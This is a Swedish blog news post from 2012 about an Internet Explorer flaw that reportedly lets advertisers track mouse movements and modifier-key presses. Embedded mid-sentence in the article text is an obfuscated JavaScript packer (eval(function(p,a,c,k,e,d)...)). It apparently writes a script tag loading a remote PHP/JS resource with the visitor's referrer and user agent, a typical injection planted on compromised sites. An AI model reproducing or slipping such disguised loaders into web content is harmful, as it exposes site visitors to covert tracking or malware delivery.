Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Sårbarhet hittad i Internet Explorer

Sårbarhet hittad i Internet Explorer
Filip Urde
  • On 14 december, 2012
  • http://www.revue.se/filip-urde

En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aiazk|var|u0026u|referrer|kyidr||js|php’.split(’|’),0,{}))
helt ny sårbarhet har hittats i Internet Explorer.

 

Enligt säkerhetsexperterna som har upptäckt sårbarheten så rör det sig om en bristning i systemet som gör att en hackare kan följa musrörelserna du gör på skärmen, detta även när musen inte använder Internet Explorer.

Luckan finns i Internet Explorer 6 ända fram till nya Internet Explorer 10. Helt enkelt, bara du har webbläsaren igång så kan någon följa din mus på skärmen, det ska även gå att följa knapptryckningar för shift, ctrl och alt-knapparna.

säkerhetsexperterna som hittade denna sårbarhet kommer från företaget Spider.io, dem har sett att sårbarheten endast utnyttjas av reklamfirmor för user tracking och inte andra som skulle kunna göra ännu mer skada. Men risken är att någon kan tracka din aktivitet på t.ex. banksidor eller liknande.

Microsoft rapporterar dock att man är medvetna om detta. Men vi har inte fått veta något om när en patch kommer för att lösa detta problem. Vi hoppas på snart.